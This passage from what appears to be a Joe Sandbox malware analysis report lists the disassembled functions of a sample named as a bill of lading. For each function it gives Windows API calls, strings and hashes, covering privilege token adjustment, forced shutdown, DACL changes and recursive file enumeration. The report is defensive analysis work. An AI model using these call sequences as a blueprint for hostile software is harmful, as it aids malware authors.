                                                                                                                      • __malloc_crt.LIBCMT ref: 00420449
                                                                                                                      • _strlen.LIBCMT ref: 0042045F
                                                                                                                      • _strcpy_s.LIBCMT ref: 0042046D
                                                                                                                      • __invoke_watson.LIBCMT ref: 00420482
                                                                                                                      • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                                                        • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                                                                        • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                        • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                        • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                        • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                      • __invoke_watson.LIBCMT ref: 004205CC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                                                                      • String ID: S\
                                                                                                                      • API String ID: 4084823496-393906132
                                                                                                                      • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                      • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                                                                      • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                      • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                                                                      Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                      • __swprintf.LIBCMT ref: 00434D91
                                                                                                                      • _wcslen.LIBCMT ref: 00434D9B
                                                                                                                      • _wcslen.LIBCMT ref: 00434DB0
                                                                                                                      • _wcslen.LIBCMT ref: 00434DC5
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                      • _memset.LIBCMT ref: 00434E27
                                                                                                                      • _wcslen.LIBCMT ref: 00434E3C
                                                                                                                      • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 302090198-3457252023
                                                                                                                      • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                      • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                      • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                      • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                      Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                      • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 1312810259-2896544425
                                                                                                                      • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                      • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                      • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                      • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                      Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                      • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcscpy.LIBCMT ref: 004038C7
                                                                                                                      • _wcscat.LIBCMT ref: 004038DC
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                        • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                        • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                      • _wcscpy.LIBCMT ref: 004039C2
                                                                                                                      • _wcslen.LIBCMT ref: 00403A53
                                                                                                                      • _wcslen.LIBCMT ref: 00403AAA
                                                                                                                      Strings
                                                                                                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                      • _, xrefs: 00403B48
                                                                                                                      • Error opening the file, xrefs: 0042B8AC
                                                                                                                      • Unterminated string, xrefs: 0042B9BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                      • API String ID: 4115725249-188983378
                                                                                                                      • Opcode ID: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                                                                                                      • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                      • Opcode Fuzzy Hash: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                                                                                                      • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                      Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                      • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                      • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                      • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                      • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                      Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Timetime$Sleep
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 4176159691-3405671355
                                                                                                                      • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                      • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                      • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                      • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                      Function 00442E1F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 134fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,74DE8FB0,74DE8FB0,?,?,00000000), ref: 00442E40
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                                                        • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                      • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                      • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                                                      • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                      • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                                                      Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                        • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                        • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                        • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                      • _memset.LIBCMT ref: 00445E61
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                      • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                      • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                      • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3490752873-0
                                                                                                                      • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                      • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                      • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                      • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                      Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                      • _memset.LIBCMT ref: 0047AB7C
                                                                                                                      • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                      • _memset.LIBCMT ref: 0047ACCD
                                                                                                                      • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                      • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1588287285-2785691316
                                                                                                                      • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                      • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                      • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                      • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                      Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                      • GetLastError.KERNEL32 ref: 00436504
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                      • API String ID: 2938487562-3733053543
                                                                                                                      • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                      • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                      • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                      • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                      Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 00436162
                                                                                                                      • __swprintf.LIBCMT ref: 00436176
                                                                                                                        • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                      • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
